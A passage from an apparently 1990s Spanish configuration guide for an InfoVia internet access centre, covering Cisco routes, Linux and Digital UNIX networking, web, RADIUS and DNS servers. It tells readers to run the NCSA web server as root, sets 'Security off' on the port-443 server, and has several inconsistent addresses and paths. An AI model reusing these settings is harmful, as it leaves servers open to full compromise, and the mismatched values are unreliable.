ip route 10.4.0.0 255.254.0.0 Serial0.3 

Por ultimo  se han de definir dos rutas que permitan al servidor de RADIUS del
CPI  enviar la  informacion a  los clientes  RADIUS  de  los CSIV  de Madrid y
Barcelona. Estas rutas se configuran en el ``router'' del CPI por medio de los
siguientes comandos: 

ip route 172.16.192.1 255.255.255.255 Serial0.2 
ip route 172.16.193.1 255.255.255.255 Serial0.3 


4.3 CONCLUSIONES 
    ------------

En  este capitulo  se ha  presentado un  ejemplo  de un  CPI, en el que se han
incluido  los ficheros  de  configuracion de  los  equipos del centro. Para el
ejemplo  se ha elegido el tipo mas complejo de CPI: el que permite el acceso a
Internet  a traves  de InfoVia. Se  ha considerado ademas un caso en el que el
CPI se conecta con dos CSIV de InfoVia.
La configuracion de los restantes tipos de CPI contemplados en este documento,
es mas  sencilla, ya que se reduce a un caso particular del ejemplo presentado
en este capitulo.


5 EJEMPLO DE CONFIGURACION DE UN CPI SOBRE PC CON SISTEMA OPERATIVO LINUX
=======================================================================


Con este tercer ejemplo de configuracion de un CPI se pretende
explicar como
instalar un CPI, del mismo tipo que el presentado en el Capitulo 4,
pero con
equipos de otro fabricante. Es decir, con este tercer ejemplo se
demuestra que
la instalacion de un CPI se puede hacer con equipos de diversos
fabricantes.
Las caracteristicas de este CPI son las que se enumeran en la
siguiente lista: 

. Tipo del CPI: es un CPI con acceso a Internet desde InfoVia. El CPI
esta a
conectado a dos CSIV de InfoVia: el CSIV de Madrid y el CSIV de
Barcelona. 

. Servicios ofrecidos por el CPI:

        * Servidor de web para InfoVia.
        * Servidor de web para Internet. 
        * Servicio de pasarela a Internet. 

. Direcciones IP del CPI:

        * Direcciones en InfoVia: El centro tiene asignado un rango de
256
        direcciones en InfoVia. Este rango se emplea para dar
direcciones de
        InfoVia a las maquinas del centro. Direcciones: Para las
maquinas del
        centro: 10.128.102.0 a 10.128.102.255.
        * Direcciones en Internet (asignadas por el IANA al
proveedor): 
        El centro tiene asignada una clase C de direcciones en
Internet: 
        Direcciones: 194.179.42.0 a 194.179.42.255 

. El servidor de RADIUS del CSIV es el que se encarga de asignar
direcciones
de InfoVia a los usuarios llamantes a cada uno de los CPIs conectados
a ese 
CSIV. Son por tanto los CSIV de Madrid y Barcelona los que controlaran
los
``pools'' de direcciones de InfoVia.

. Para los usuarios que accedan a Internet desde InfoVia, el CPI tiene
definido un ``pool'' de direcciones que puede asignar dinamicamente a
los
usuarios llamantes. Este ``pool'' a su vez se divide en dos rangos,
uno
para los usuarios llamantes al CSIV de Madrid y otro para los usuarios
llamantes al CSIV de Barcelona. Este ``pool'' comprende las siguientes
direcciones:

        * ``Pool'' de direcciones para los usuarios llamantes al CSIV
de
        Madrid. De 194.179.42.129 a 194.179.42.158, es decir un rango
de 30
        direcciones.
        * ``Pool'' de direcciones para los usuarios llamantes al CSIV
de
        Barcelona. De 194.179.42.161 a 194.179.42.190, es decir un
rango de
        30 direcciones.
 
Cuando cualquiera de los dos CSIV (Madrid o Barcelona) detecta que un
usuario
quiere acceder a Internet a traves de este CPI, el cliente de RADIUS
del
CSIV correspondiente consultara al servidor RADIUS del CPI elegido por
el 
usuario llamante. 

El equipamiento del CPI es el siguiente:

. Una maquina PC Compatible, con procesador 386 o superior, equipada
con dos
tarjetas de interfaz ethernet. El sistema operativo instalado es el
Linux
1.2.13 o superior. 

. Un ``router'' CISCO 2500, equipado con una interfaz ethernet y dos
interfaces serie. Solo se van a emplear la interfaz ethernet y una de
las
interfaces serie.

. Un enlace ``frame-relay'' a 64 Kbit/s con tres PVCs, el 17 (para
Internet),
el 18 (para el CSIV de Madrid), y el 19 (para el CSIV de Barcelona).
Cada PVC
garantiza una velocidad minima de 16 Kbit/s.

. La RAL del CPI es Ethernet 10 Base 2. 


5.1 CONFIGURACION DE LA MAQUINA LINUX
    ---------------------------------

En la maquina Linux del CPI se han instalado los siguientes
servidores:

. Un servidor de web NCSA. Se configura de modo que se comporte como
dos
servidores de web independientes, uno atendiendo a los accesos que
llegan por 
la interfaz eth0 (Internet) y el otro atendiendo los accesos que
llegan por la 
interfaz eth1 (InfoVia).

. Un servidor de RADIUS cuya mision es la de asignar dinamicamente las
direc-
ciones del ``pool'' de direcciones de Internet manejado por el CPI. 

. Un servidor DNS.

En los siguientes puntos se detalla la configuracion de la maquina asi
como de
los diferentes servidores instalados en ella. 


5.1.1 Instalacion de las dos tarjetas Ethernet
      ----------------------------------------

Para la instalacion de dos o mas tarjetas ethernet en una maquina
Linux
pueden seguirse las instrucciones dadas en la mini-HowTo
``Multiple-Ethernet''
que se encuentra en:

/usr/doc/faq/howto/mini/Multiple-Ethernet.gz 

En concreto, en el fichero /etc/lilo.conf, debe incluirse una linea
que ponga
lo siguiente: 

append=''ether=0,0,eth0 ether=0,0,eth1''

Una vez hecho esto, debe ejecutarse lilo.


5.1.2 Configuracion de direcciones, interfaces y rutas.
      -------------------------------------------------

La maquina dispone de dos interfaces, la eth0 y la eth1, a las que se
le
asignan las siguientes direcciones IP: 

. Direccion IP de la tarjeta eth0 (Internet): 194.179.42.2
. Direccion IP de la tarjeta eth1 (InfoVia): 10.128.102.2
 
El que la maquina Linux necesite dos tarjetas de interfaz de RAL se
debe a
que el ``Kernel'' no admite multiples direcciones IP para una unica
interfaz. 
En el ejemplo se ha supuesto que el proveedor divide la clase C (256
direcciones) que se le ha concedido en subredes de 64 maquinas cada
una.
Por otra parte, en InfoVia, para los usuarios llamantes y los CPIs se
asignan
direcciones de la clase A 10.0.0.0 reservada por Internet para redes
privadas.
Esta clase A se subdivide en dos redes, la que va de 10.0.0.0 a
10.127.255.255
para los usuarios, mientras que las direcciones 10.128.0.0 a
10.255.255.255
para los CPIs. De acuerdo con esto, las mascaras correspondientes
seran:

. Mascara para la direccion IP de Internet: 255.255.255.192
. Mascara para la direccion IP de InfoVia: 255.128.0.0

En lo que a rutas se refiere, ha de habilitarse una ruta que permita
encaminar
el trafico de los usuarios de InfoVia y el trafico con el CSIV. En
esta ruta,
todo el trafico de las direcciones que van de la 10.0.0.0 a la
10.127.255.255,
ha de encaminarse a traves del ``router'' del CPI, el 10.128.102.1, y
ademas
permite que los paquetes salientes de la maquina tengan como direccion
origen
la de InfoVia.

Los ficheros necesarios para configurar las direcciones son:

. /etc/hosts
. /etc/rc.d/rc.inet1 
A continuacion se indica la forma de configurar las interfaces.


5.1.2.1 Configuracion de la interfaz Internet (eth0)
        --------------------------------------------

Para la configuracion de la primera interfaz se usara el ``script''
netconfig
que ofrece el sistema operativo.
Una vez invocado se contestara a las preguntas que va haciendo:

. Enter hostname: maquina-in
. Enter domain name for maquina-in: dom.es 
. Do you plan to ONLY use loopback?: NO 
. Enter IP address fo maquina-in (aaa.bbb.ccc.ddd): 194.179.42.2 
. Enter gateway address (aaa.bbb.ccc.ddd): 194.179.42.1 
. Enter netmask (aaa.bbb.ccc.ddd): 255.255.255.192 
. Will you be accessing a nameserver?: NO (1) 

Editar el fichero /etc/hosts y aadir la linea:

194.179.42.1 router-in


5.1.2.2 Configuracion de la Interfaz InfoVia (eth1)
        -------------------------------------------

Editar el fichero /etc/hosts y aadir las siguientes lineas:

10.128.102.1 router-iv
10.128.102.2 maquina-iv 

Editar el fichero /etc/rc.d/rc.inet1, y aadir las lineas:

# Configuracion de la interfaz eth1
/sbin/ifconfig eth1 10.128.102.2 broadcast 10.128.255.255 netmask
255.128.0.0 

Para que el CPI pueda encaminar el trafico de los usuarios llamantes a
InfoVia
y que los paquetes con destino a esos usuarios tengan como direccion
origen la
de InfoVia, hay que incluir en el fichero la siguiente linea:

/sbin/route add -net 10.0.0.0 gw 10.128.102.1 metric 1 dev eth1 

Para que el CPI pueda encaminar la informacion con destino al cliente
RADIUS
del CSIV de InfoVia al que se ha conectado, asi como al ``router'' del
CSIV
al que se conecta el CPI, debe incluirse en este fichero la linea:

/sbin/route add -host 172.16.192.1 gw 10.128.102.1 metric 1 dev eth1
/sbin/route add -host 172.16.193.1 gw 10.128.102.1 metric 1 dev eth1 

Mover la linea /sbin/route add default gw ${GATEWAY} metric 1 al final
del
fichero 1 .

1. En caso de querer configurar un servidor de nombres del dominio
dom.es
se contestara SI a la pregunta, y a la siguiente pregunta se
respondera con
la direccion IP del servidor. Tambien puede hacerse editando el
fichero
/etc/resolv.conf y aadiendo, por cada servidor, una linea que
contenga en
primer lugar la palabra nameserver seguida de la direecion IP del
servidor. 
 

5.1.3 Configuracion del servidor de web
      ---------------------------------

Se instala como superusuario un unico servidor web NCSA (http_1.5a-
export_linux1.2.13.tar.Z) en la maquina Linux. El servidor queda
instalado en
el directorio: /usr/local/etc/httpd
Debajo de este directorio se crean los directorios htdocs, htdocs-iv,
logs-in
y logs-iv.
En el directorio /usr/local/etc/httpd/conf se renombran los siguientes
archivos:

access.conf-dist como access.conf
httpd.conf-dist como httpd.conf 
localhost.srm-dist como localhost.conf 
srm.conf-dist como srm.conf 

Se edita el fichero /usr/local/etc/httpd/conf/httpd.conf y se cambian
las
siguientes lineas:

User nobody por User root
Group #-1 por Group root 
ServerAdmin you@your.address por ServerAdmin
postmaster@maquina-in.dom.es 
ErrorLog logs/error_log por ErrorLog logs-in/error_log 
TransferLog logs/access_log por TransferLog logs-in/access_log 
AgentLog logs/agent_log por AgentLog logs-in/agent_log 
RefererLog logs/referer_log por RefererLog logs-in/refere_log 
PidFile logs/httpd.pid por logs-in/httpd.pid 
DocumentRoot /local por DocumentRoot /usr/local/etc/httpd 

Al final del fichero se aaden las siguientes lineas para permitir el
acceso
a las paginas de web desde InfoVia:

<VirtualHost 10.128.102.2>
ServerName maquina-iv 
ServerAdmin postmaster@maquina_inf 
DocumentRoot /usr/local/etc/htdocs-iv 
ErrorLog logs-iv/error_log 
TransferLog logs-iv/access_log 
AgentLog logs-iv/agent_log 
RefererLog logs-iv/refere_log 
</VirtualHost> 


5.1.4 Configuracion del servidor de RADIUS
      ------------------------------------

El CPI elegido para el ejemplo permite el acceso a Internet a traves
de
InfoVia. Por lo tanto debera instalarse en la maquina Linux del CPI un
servidor de RADIUS que gestione el rango de direcciones de Internet y
las
vaya asignando a los usuarios llamantes. En el ejemplo propuesto, este
``pool'' de direcciones IP asignadas por el IANA al proveedor esta
dividido a
su vez en dos ``pools'', uno para el CSIV de Madrid y otro para el
CSIV de
Barcelona. El rango asignado al primer CSIV es el que va de la
direccion
194.179.42.129 a la 194.179.42.158. El rango asignado al segundo CSIV
va de
la direccion 194.179.42.161 a la 194.179.42.190.
En el ejemplo, el servidor RADIUS del CPI se ha instalado en el
directorio: 

/home/prueba/radius_cpi_pr

Para obtener el fichero ejecutable del servidor, los ficheros fuente
del
servidor RADIUS deberan compilarse para una maquina Linux. El fichero
ejecutable se ha situado en el directorio /home/prueba/radius_cpi_pr.
Para el
arranque del servidor, desde el directorio /home/prueba/radius_cpi_pr
ha de
ejecutarse el comando:

nohup radiusd -d . &

Si se quieren trazas del servidor, en el directorio
/home/prueba/radius_cpi_pr
deberan ejecutarse los siguientes comandos:

touch Activar.radius1
touch Activar.radius2 

El servidor estara activo si al ejecutar el comando:

ps -ax | grep radiusd

Se obtiene como respuesta:

12675 pp0 S N 0:00 radiusd -d .
12679 pp0 S 0:00 grep radiusd 

Las opciones con las que se ejecuta el comando radius son:
 
        * -d nombre_del_directorio_radius 

Los ficheros de configuracion del servidor, almacenados en el
directorio
indicado, son los mismos que se indicaron en el apartado apartado
4.1.3 del
Capitulo 4.


5.1.5 Configuracion del servidor DNS
      ------------------------------

El servidor de nombres se arranca con el comando named del sistema
operativo.
Para el correcto funcionamiento del servidor DNS es necesario crear
los
ficheros de configuracion indicados en el apartado 4.1.4 de este
documento. 
Para que el servidor de nombres arranque automaticamente tras un
rearranque
de la maquina, se editara el fichero /etc/rc.d/rc.inet2 y se borrara
el
caracter de comentario (#) de las siguientes lineas:

# Start the NAMED/BIND name server.
if [ -f ${NET}/named ]; then 
echo -n `` named'' 
${NET}/named 
fi 


5.2 CONFIGURACION DEL ``ROUTER''
    ----------------------------

Al emplearse en este ejemplo el mismo ``router'' que en el ejemplo del
Capitulo 4, el fichero de configuracion es el mismo que el recogido en
el apartado 4.2 de este documento.


6 EJEMPLO DE CONFIGURACION DE UN CPI SOBRE UNA MAQUINA CON DIGITAL
UNIX
 
======================================================================

Con este ejemplo de configuracion de un CPI se explica como instalar
un CPI,
del mismo tipo que los presentados anteriormente, pero con un nuevo
equipamiento. Las caracteristicas de este CPI son las siguientes

. Tipo del CPI: es un CPI con acceso a Internet desde InfoVia. El CPI
esta a
conectado a dos CSIV de InfoVia: el CSIV de Madrid y el CSIV de
Barcelona. 

. Servicios ofrecidos por el CPI:

        * Servidor de web para InfoVia.
        * Servidor de web para Internet. 
        * Servicio de pasarela a Internet. 

. Direcciones IP del CPI:

        * Direcciones en InfoVia: El centro tiene asignado un rango de
256
        direcciones en InfoVia. Este rango se emplea para dar
direcciones
        de InfoVia a las maquinas del centro. Direcciones: Para las
maquinas
        del centro: 10.128.10.0 a 10.128.10.255.
        * Direcciones en Internet (asignadas por el IANA al
proveedor): 
        El centro tiene asignada una clase C de direcciones en
Internet: 
        Direcciones: 192.168.2.0 a 192.168.2.255 

. El servidor de RADIUS del CSIV es el que se encarga de asignar
direcciones
de InfoVia a los usuarios llamantes a cada uno de los CPIs conectados
a ese 
CSIV. Son por tanto los CSIV de Madrid y Barcelona los que controlaran
los
``pools'' de direcciones de InfoVia.

. Para los usuarios que accedan a Internet desde InfoVia, el CPI tiene
definido un ``pool'' de direcciones que puede asignar dinamicamente a
los
usuarios llamantes. Este ``pool'' a su vez se divide en dos rangos,
uno para
los usuarios llamantes al CSIV de Madrid y otro para los usuarios
llamantes
al CSIV de Barcelona. Este ``pool'' comprende las siguientes
direcciones: 

        * ``Pool'' de direcciones para los usuarios llamantes al CSIV
de
        Madrid. De 192.168.2.129 a 192.168.2.158, es decir un rango de
30
        direcciones.
        * ``Pool'' de direcciones para los usuarios llamantes al CSIV
de
        Barcelona. De 192.168.2.161 a 192.168.2.190, es decir un rango
de 30
        direcciones.

Cuando cualquiera de los dos CSIV (Madrid o Barcelona) detecta que un
usuario
quiere acceder a Internet a traves de este CPI, el cliente de RADIUS
del
CSIV correspondiente consultara al servidor RADIUS del CPI elegido por
el 
usuario llamante. 

El equipamiento del CPI es el siguiente:

. Una maquina Digital Alphaserver 1000,, equipada con dos tarjetas de
interfaz ethernet. El sistema operativo instalado es el Digital Unix
3.2C. 

. Un ``router'' CISCO 2500, equipado con una interfaz ethernet y dos
interfaces serie. Solo se van a emplear la interfaz ethernet y una de
las
interfaces serie.

. Un enlace frame relay a 64 Kbit/s con tres PVCs, el 17 (para
Internet),
el 18 (para el CSIV de Madrid), y el 19 (para el CSIV de Barcelona).
Cada PVC garantiza una velocidad minima de 16 Kbit/s.

. La RAL del CPI es Ethernet 10 Base 2.

En los proximos apartados se detalla la configuracion de cada una de
las maquinas que
integran el CPI del ejemplo.


6.1 CONFIGURACION DE LA MAQUINA DIGITAL UNIX
     ----------------------------------------

En la maquina Digital UNIX del CPI se han instalado los siguientes
servidores:

. Un servidor de web Netscape Commerce Server. Se configura de modo
que se
comporte como dos servidores de web independientes, uno atendiendo a
los 
accesos que llegan por la interfaz tu0 (Internet) y el otro atendiendo
los
accesos que llegan por la interfaz tu1 (InfoVia).

. Un servidor de RADIUS cuya mision es la de asignar dinamicamente las
direc-
ciones del ``pool'' de direcciones de Internet manejado por el CPI. 
En los siguientes puntos se detalla la configuracion de la maquina asi
como
de los diferentes servidores instalados en ella. 


6.1.1 Configuracion de direcciones, interfaces y rutas.
      -------------------------------------------------

La maquina dispone de dos interfaces, la tu0 y la tu1, a las que se le
asignan
las siguientes direcciones IP: 

. Direccion IP de la tarjeta tu0 (Internet): 192.168.2.7

. Direccion IP de la tarjeta tu1 (InfoVia): 10.128.10.7
El que la maquina Digital Alphaserver 1000 necesite dos tarjetas de
interfaz
RAL se debe a que las maquinas Digital UNIX no admiten doble direccion
IP.
Esta es la unica diferencia apreciable entre el ejemplo del Capitulo 4
y
el ejemplo descrito en este capitulo.
En el ejemplo se ha supuesto que el proveedor divide la clase C (256
direcciones) que se le ha concedido en subredes de 64 maquinas cada
una.
Por otra parte, en InfoVia, para los usuarios llamantes y los CPIs se
asignan
direcciones de la clase A 10.0.0.0 reservada por Internet para redes
privadas.
Esta clase A se subdivide en dos redes, la que va de 10.0.0.0 a
10.127.255.255
para los usuarios, mientras que las direcciones 10.128.0.0 a
10.255.255.255
para los CPIs. De acuerdo con esto, las mascaras correspondientes
seran:

. Mascara para la direccion IP de Internet: 255.255.255.192
. Mascara para la direccion IP de InfoVia: 255.128.0.0

En lo que a rutas se refiere, ha de habilitarse una ruta que permita
encaminar el trafico de los usuarios de InfoVia y el trafico con el
CSIV.
En esta ruta, todo el trafico de las direcciones que van de la
10.0.0.0 a la
10.127.255.255, ha de encaminarse a traves del ``router'' del CPI, el
10.128.10.1, y ademas permite que los paquetes salientes de la maquina
tengan
como direccion origen la de InfoVia.

Los ficheros necesarios para configurar las direcciones son:

. /etc/hosts
. /etc/rc.config 

El contenido de estos ficheros se muestra en los siguientes
subapartados. La
configuracion de la red se realiza utilizando la herramienta netsetup
del menu
de configuracion del sistema.

6.1.1.1 Fichero /etc/hosts
        ------------------

En este fichero se asocian las direciones IP de las maquinas con sus
nombres.
Se editara este fichero y se aadiran las siguientes lineas:

#
127.0.0.1 localhost 
192.168.2.7 alphaosf.digital.es alphaosf 
192.168.2.1 router router-Internet 
10.128.2.7 digital.inf alphaosf-infovia 
10.128.2.1 router-infovia router-inf 
10.1.1.2 Fichero /etc/rc.config 

En este fichero se le indica a la maquina su nombre, asi como las
interfaces
configuradas y las distintas opciones de configuracion de la red
activadas
utilizando la herramienta netsetup. 
En este fichero se pueden configurar y activar, o activar, interfaces,
asi
como definir el tipo de encaminamiento (``routing'') utilizado. El
fichero
debe contener las siguientes lineas indicando el numero de interfaces
definidas y la configuracion de estas.
 
#!/bin/sh 
#HOSTNAME - host name of the system 
# 
#NUM_NETCONFIG - number of network devices currently configured 
# 
#MAX_NETDEVS - maximun number of network devices that can be
configured 
# which is currently set by netsetup to a value of 16 
# 
#NETDEV_n - network device name for network devices currently 
# configured, where n is 0 to MAX_NETDEVS- 1 
# for example, NETDEV_0=''ln0'' 
# 
#IFCONFIG_n - ifconfig parameters for network devices currently 
# configured, where n is 0 to MAX_NETDEVS - 1 
# (see ifconfig(8) manual page) 
# for example, IFCONFIG_0=''130.124.1.20 netmask 255.255.255.0'' 
# 
#RWHOD - ``yes'' if rwhod is enabled, blank or ``no'' if rwhold is
disabled 
# 
#ROUTED - ``yes'' if routed is enabled, blank or ``no'' if routed is
disabled 
# 
#ROUTED_FLAGS - routed flags (see routed(8) manual page) 
# 
#ROUTER - ``yes'' if the system is set up to be an Internet Protocol
router, 
# otherwise, blank or ``no'' 
# 
#GATED - ``yes'' if gated is enabled, blank or ``no'' if gated is
disabled 
# 
#GATED_FLAGS - gated flags (see gated(8) manual page) 
# 
DISPLAYTYPE= 
HOSTNAME=''alphaosf'' 
NUM_NETCONFIG=''2'' 
MAX_NETDEVS=''24'' 
NETDEV_0=''tu0'' 
NETDEV_1=''tu1'' 
NETDEV_2= 
NETDEV_3= 
NETDEV_4= 
NETDEV_5= 
NETDEV_6= 
NETDEV_7= 
IFCONFIG_0=''192.168.2.7 netmask 255.255.255.192'' 
IFCONFIG_1=''10.128.10.7 netmask 255.128.0.0'' 
IFCONFIG_2= 
IFCONFIG_3= 
IFCONFIG_4= 
IFCONFIG_5= 
IFCONFIG_6= 
IFCONFIG_7= 
RWHOD=''no'' 
ROUTED=''yes'' 
ROUTED_FLAGS=''-q'' 
ROUTER=''no'' 
GATED=''no'' 
GATED_FLAGS= 
PAGERAW=''1'' 
PAGEFILE=''/dev/rz1b'' 
PARTITION=''rz1b'' 
PARTITIONTYPE=''RZ2SL'' 
PAGEMINSZ=0 
PAGEMAXSZ=0 
QUOTA_CONFIG= 
export DISPLAYTYPE HOSTNAME NUM_NETCONFIG QUOTA_CONFIG 
export NETDEV_0 NETDEV_1 NETDEV_2 NETDEV_3 NETDEV_4 NETDEV_5 
NETDEV_6 NETDEV_7 
export IFCONFIG_0 IFCONFIG_1 IFCONFIG_2 IFCONFIG_3 IFCONFIG_4 
IFCONFIG_5 
export IFCONFIG_6 IFCONFIG_7 RWHOD ROUTED ROUTED_FLAGS GATED 
GATED_FLAGS 
export ROUTER MAX_NETDEVS 
export PAGERAW PAGEFILE PARTITION PARTITIONTYPE PAGEMINSZ 
PAGEMAXSZ 
LAT_SETUP=''1'' 
export LAT_SETUP 


6.1.1.3 Nombre de la maquina
        --------------------

En este fichero se incluyen las rutas necesarias para encaminar
adecuadamente
el trafico del CPI. Para que el CPI pueda encaminar el trafico de los
usuarios
llamantes a InfoVia y que los paquetes con destino a esos usuarios
tengan como
direccion origen la de InfoVia, hay que definir la siguiente ruta:

-net 10.0.0.0 10.128.10.1

Para que el CPI pueda encaminar la informacion con destino al cliente
RADIUS
del CSIV de InfoVia al que se ha conectado, asi como al ``router'' del
CSIV
al que se conecta el CPI, debe incluirse en este fichero la ruta: 

-net 172.16.0.0 10.128.10.1

Para configurar la ruta por defecto, en este fichero ha de incluirse
la
siguiente ruta:

default 192.168.2.1

Para incluir todas estas rutas, se debe utilizar la herramienta
netsetup del
menu de configuracion del sistema. El fichero resultante de aadir
estas rutas
es el siguiente:

-net 10.0.0.0 10.128.10.1
-net 172.16.0.0 10.128.10.1 
default 192.168.2.1 
 

6.1.2 Configuracion del servidor de web
      ---------------------------------

Se ha instalado un unico servidor web Netscape (se trata del Netscape
Commerce Server) en la maquina UNIX. El servidor queda instalado en el
directorio:

/usr/ns-home

Para facilitar la configuracion del servidor Netscape, existe un
segundo
servidor instalado en otro puerto que no es el estandar (el puerto
estandar
es el 80). Para saber cual es el puerto no estandar se ha de ejecutar
el
comando:

/usr/ns-home/start-admin

Una vez ejecutado este comando se sabe cual es el puerto al que hay
que
conectarse para configurar el servidor Netscape, tanto para el caso de
la
interfaz tu0 como el de la interfaz tu1. 
Para la configuracion y arranque del servidor Netscape se ha dispuesto
de un
terminal X-Windows. En este terminal existia un cliente Netscape, por
medio
del cual, conectandose al puerto no estandar de la maquina, se
configuro el
servidor Netscape. Al configurarlo se ha hecho de forma tal que se
comporte
como dos servidores independientes, uno con la direccion IP
192.168.2.7
(la correspondiente a la interfaz tu0 del servidor) y otro con la
direccion IP
10.128.10.7 (la correspondiente a la interfaz tu1 del servidor). De
este modo,
la configuracion del servidor Netscape se ha podido hacer por medio de
paginas
web, lo que simplifica el trabajo y evita editar todos los ficheros de
configuracion que se adjuntan en este apartado.
El servidor web para Internet esta configurado para ``escuchar'' por
el puerto
443, el puerto estandar para transacciones seguras del protocolo SSL
(Secure Sockets Layer) del Netscape Commerce Server, mientras que el
servidor
web para InfoVia esta configurado para utilizar el puerto 80, estandar
para
paginas web.
En el fichero admpw se define la clave (``password'') necesaria para
la
configuracion remota, por medio de un cliente Netscape del servidor
Netscape.
En el ejemplo, este fichero esta en el directorio
/usr/ns-home/admserv/. 
Una vez explicado como se puede configurar de forma remota el
servidor, se
puede pasar a ver en detalle los ficheros de configuracion del mismo.
El
fichero ejecutable del servidor Netscape es: 

/usr/ns-home/bin/httpd/ns-httpd
 
Para que el unico servidor se comporte como si se tratase de dos
servidores 
independientes, uno para cada una de .las direcciones IP asignadas a
la
maquina, se han creado los directorios:
Configuracion del servidor web para Internet (direccion IP
192.168.2.7): 
El directorio de configuracion del servidor:

/usr/ns-home/httpd-443.192.168.2.7/config

El directorio en el que se almacenan los ficheros con las conexiones
(``logs'')
al servidor de Internet: 

/usr/ns-home/httpd-443.192.168.2.7/logs

Los ficheros ejecutables:

/usr/ns-home/httpd-443.192.168.2.7/restart
/usr/ns-home/httpd-443.192.168.2.7/rotate 
/usr/ns-home/httpd-443.192.168.2.7/start 
/usr/ns-home/httpd-443.192.168.2.7/stop 

Configuracion del servidor web para InfoVia (direccion IP 10.128.2.7):
El directorio de configuracion del servidor:

/usr/ns-home/httpd-80.10.128.2.7/config

El directorio en el que se almacenan los ficheros con las conexiones
(``logs'')
al servidor de InfoVia:

/usr/ns-home/httpd-80.10.168.10.7/logs

Los ficheros ejecutables:

/usr/ns-home/httpd-80.10.128.10.7/restart
/usr/ns-home/httpd-80.10.128.10.7/rotate 
/usr/ns-home/httpd-80.10.128.10.7/start 
/usr/ns-home/httpd-80.10.128.10.7/stop 

Para configurar el servidor web Netscape, y que se comporte como dos
servidores
independientes, han de configurarse los siguientes ficheros: 
Configuracion del servidor web para Internet (direccion IP
192.168.2.7): 
El directorio de configuracion del servidor:

/usr/ns-home/httpd-443.192.168.2.7/config/magnus.conf
/usr/ns-home/httpd-443.192.168.2.7/config/obj.conf 

Configuracion del servidor web para InfoVia (direccion IP 10.128.2.7):
El directorio de configuracion del servidor:

/usr/ns-home/httpd-80.10.128.10.7/config/magnus.conf
/usr/ns-home/httpd-80.10.128.10.7/config/obj.conf 
 
Para el arranque del ``servidor'' de Internet, se ha de ejecutar el
comando. 

/usr/ns-home/httpd-443.192.168.2.7/start

Para el arranque del ``servidor'' de InfoVia, se ha de ejecutar el
comando.

/usr/ns-home/httpd-80.10.128.10.7/start

La ruta de acceso (``path'') de los ficheros anteriores no tiene por
que ser esa,
ya que puede instalarse el servidor en otro sitio. Pero en el ejemplo
que aqui
se presentan, se ha instalado el servidor en el directorio
/usr/ns-home. 


6.1.2.1 Fichero /usr/ns-home/httpd-443.192.168.2.7/config/magnus.conf
        -------------------------------------------------------------

#ServerRoot /usr/ns-home/https-443.192.168.2.7 
Port 443 
Address 192.168.2.7 
LoadObjects obf.conf 
RootObject default 
ErrorLog /usr/ns-home/https-443.192.168.2.7/logs/errors 
PidLog /usr/usr/ns-home/https-443.192.168.2.7/logs/pid 
User httpd 
ServerName alphaosf.telefonica.es 
Security off 
MinProcs 16 
MaxProcs 32 
DNS on 
Init fn=load-types mime-types= mime-types 
Init fn=init-clf global=/usr/ns-home/https-443.192.168.2.7/logs/access

secure=/usr/ns-home/https-443.192.168.2.7/logs/secure 


6.1.2.2 Fichero /usr/ns-home/httpd-443.192.168.2.7/config/obj.conf
        ----------------------------------------------------------

<Object name=default> 
NameTrans fn=pfx2dir from=/mc-icons dir=''/usr/ns-home/mc-icons'' 
NameTrans fn=document-root root=''/usr/ns-home/docs/internet'' 
PathCheck fn=unix-uri-clean 
PathCheck fn=find-pathinfo 
PathCheck fn=find-index index-names=''index.html,home.html'' 
ObjectType fn=type-by-extension 
ObjectType fn=force-type type=text/plain 
Service method=(GET|HEAD) type=magnus-internal/imagemap 
fn=imagemap 
Service method=(GET|HEAD) type=magnus-internal/directory fn=index- 
common 
Service method=(GET|HEAD) type=*magnus-internal/* fn=send-file 
AddLog fn=common-log 
AddLog fn=record-keysize name=secure 
</Object> 
<Object name=cgi> 
ObjectType fn=force-type type=magnus-internal/cgi 
Service fn=send-cgi 
</Object> 


6.1.2.3 Fichero /usr/ns-home/httpd-80.10.128.2.7/config/magnus.conf
        -----------------------------------------------------------

#ServerRoot /usr/ns-home/https-443.192.168.2.7 
Port 80 
Address 10.128.2.7 
LoadObjects obf.conf 
RootObject default 
ErrorLog /usr/ns-home/https-80.10.128.2.7/logs/errors 
PidLog /usr/usr/ns-home/https-80.10.128.2.7/logs/pid 
User httpd 
ServerName alphaosf-infovia.telefonica.inf 
Security off 
MinProcs 16 
MaxProcs 32 
DNS on 
Init fn=load-types mime-types= mime-types 
Init fn=init-clf global=/usr/ns-home/https-80.10.128.2.7/logs/access
secure=/ 
usr/ns-home/https-80.10.128.2.7/logs/secure 


6.1.2.4 Fichero /usr/ns-home/httpd-80.10.128.2.7/config/obj.conf
        --------------------------------------------------------

<Object name=default> 
NameTrans fn=pfx2dir from=/mc-icons dir=''/usr/ns-home/mc-icons'' 
NameTrans fn=document-root root=''/usr/ns-home/docs/internet'' 
PathCheck fn=unix-uri-clean 
PathCheck fn=find-pathinfo 
PathCheck fn=find-index index-names=''index.html,home.html'' 
ObjectType fn=type-by-extension 
ObjectType fn=force-type type=text/plain 
Service method=(GET|HEAD) type=magnus-internal/imagemap 
fn=imagemap 
Service method=(GET|HEAD) type=magnus-internal/directory fn=index- 
common 
Service method=(GET|HEAD) type=*magnus-internal/* fn=send-file 
AddLog fn=common-log 
AddLog fn=record-keysize name=secure 
</Object> 
<Object name=cgi> 
ObjectType fn=force-type type=magnus-internal/cgi 
Service fn=send-cgi 
</Object> 


6.1.3 Configuracion del servidor RADIUS
      ---------------------------------

El CPI elegido para el ejemplo permite el acceso a Internet a traves
de InfoVia.
Por lo tanto, debera instalarse en la maquina UNIX del CPI un servidor
RADIUS
que gestione el ``pool'' de direcciones de Internet y las vaya
asignando a los
usuarios llamantes. En el ejemplo propuesto, este ``pool'' de
direcciones IP
asignadas por el IANA al proveedor esta dividido a su vez en dos
rangos, uno
para el CSIV de Madrid, y otro para el CSIV de Barcelona. El rango
asignado
al primer CSIV es el que va de la direccion 192.168.2.129 a la
192.168.2.158.
El rango asignado al segundo CSIV es el que va de la direccion
192.168.2.161
a la 192.168.2.190. 
En el ejemplo, el servidor RADIUS se ha instalado en el directorio: 

/usr/users/prueba/radius_osf

Para obtener el fichero ejecutable del servidor, los ficheros fuente
del
servidor RADIUS deberan compilarse para una maquina UNIX de Digital.
El
fichero ejecutable se ha situado en el directorio
/usr/users/prueba/radius_osf.
Para el arranque del servidor, desde el directorio anterior ha de
ejecutarse
el comando:

nohup ./radiusd -d &

Si se quieren trazas del servidor, en el directorio
/usr/users/prueba/radius_osf deberan ejecutarse los siguientes
comandos: 

touch Activar.radius1
touch Activar.radius2 

El servidor estara activo si al ejecutar el comando:

